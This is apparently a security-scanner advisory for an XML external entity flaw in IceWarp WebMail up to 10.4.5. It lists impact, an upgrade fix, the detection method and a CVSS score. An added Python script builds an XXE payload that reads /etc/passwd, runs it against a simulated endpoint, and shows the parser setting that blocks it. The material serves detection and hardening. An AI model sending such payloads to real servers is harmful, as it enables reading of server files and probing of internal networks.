Summary
The remote IceWarp WebMail is prone to an information-disclosure vulnerability caused by XML external entity (XXE) resolution.
Impact
Attackers can exploit this issue to gain access to potentially sensitive information, such as the contents of files on the server, and to make the server issue requests to hosts on the internal network.
Impact Level: System/Application
Solution
Vendor updates are available. Update to a version later than 10.4.5.
Insight
The XML parser used by the web mail interface resolves external XML entities. An attacker who submits XML containing an external entity declaration can make the parser read local files and return their contents in the response, or make the server send requests to systems on the internal network (server-side request forgery, e.g. port scanning). The risk is greatly increased by the fact that the flaw can be exploited by anonymous users who have no account on the server.
Affected
IceWarp Mail Server versions up to and including 10.4.5.
Detection
Sends a specially crafted HTTP POST request whose XML body declares and references an external entity, and checks the response for the resolved entity content.
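The following Python script is an added illustration of the mechanism described under Insight and of the check described under Detection; it is not code from the original page and not IceWarp code. It builds the crafted XML body, runs it through a simulated endpoint that parses the POST body with Python's xml.sax parser and echoes one element back, and applies the detection check to the response. Everything about the endpoint is an assumption for the demonstration: that it echoes the <user> element, that the attacker targets file:///etc/passwd, that the string root:x:0:0 serves as the leak marker, and the fake file contents served to the parser are constructed, not real. The same parser is run twice, once with external general entity resolution enabled (the vulnerable configuration) and once with it disabled (the hardened one), so the script also shows the fix.

```python
"""XXE probe against a simulated endpoint (added example, not from the
advisory or from IceWarp).  Assumptions: the endpoint echoes the <user>
element back, the target file is /etc/passwd, and "root:x:0:0" is the marker
that proves the external entity was expanded."""
import io
import xml.sax
from xml.sax import handler
from xml.sax.xmlreader import InputSource

# Constructed stand-in for the server's file system (not real data).
FAKE_FS = {
    "file:///etc/passwd": b"root:x:0:0:root:/root:/bin/bash",
}

MARKER = "root:x:0:0"  # assumed detection marker for the leaked file


def build_xxe_payload(target="file:///etc/passwd"):
    """Craft the POST body: declare an external general entity that points
    at `target` and reference it inside the element the server echoes."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE login [<!ENTITY xxe SYSTEM "{target}">]>\n'
        "<login><user>&xxe;</user><pass>x</pass></login>"
    )


class _FileResolver(handler.EntityResolver):
    """Resolve SYSTEM identifiers against FAKE_FS.  A real parser would open
    the path or URL on the host; this is what turns XXE into a file read."""

    def resolveEntity(self, publicId, systemId):
        src = InputSource(systemId)
        src.setByteStream(io.BytesIO(FAKE_FS.get(systemId, b"")))
        return src


class _UserCollector(handler.ContentHandler):
    """Collect the character data of <user>, entity expansions included."""

    def __init__(self):
        super().__init__()
        self.in_user = False
        self.user = []

    def startElement(self, name, attrs):
        self.in_user = name == "user"

    def endElement(self, name):
        if name == "user":
            self.in_user = False

    def characters(self, content):
        if self.in_user:
            self.user.append(content)


def simulated_server(post_body, resolve_external_entities):
    """Stand-in for the web mail endpoint: parse the posted XML and echo the
    user name in an error message.  `resolve_external_entities` selects the
    vulnerable (True) or hardened (False) parser configuration."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    parser.setEntityResolver(_FileResolver())
    collector = _UserCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(post_body.encode()))
    return "Login failed for user: " + "".join(collector.user)


def is_vulnerable(response_body):
    """Detection step: the file content appears in the response only if the
    parser expanded the external entity."""
    return MARKER in response_body


def check(resolve_external_entities):
    """Run the whole probe (craft payload, POST, inspect response)."""
    response = simulated_server(build_xxe_payload(), resolve_external_entities)
    return is_vulnerable(response)


if __name__ == "__main__":
    print("vulnerable parser leaks file:", check(True))
    print("hardened parser leaks file:", check(False))
```

The hardening shown is the generic one for this bug class: disable external entity resolution in the parser (here `feature_external_ges` set to False; in other XML libraries the equivalent switch, or a DTD-less parser). Against a real target the probe would send the payload over HTTP rather than call `simulated_server`, and the marker should be chosen for the target platform rather than assumed.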
References
Severity
Classification
-
CVSS Base Score: 9.0 (CVSSv2)
CVSS Base Vector: AV:N/AC:L/Au:N/C:P/I:C/A:P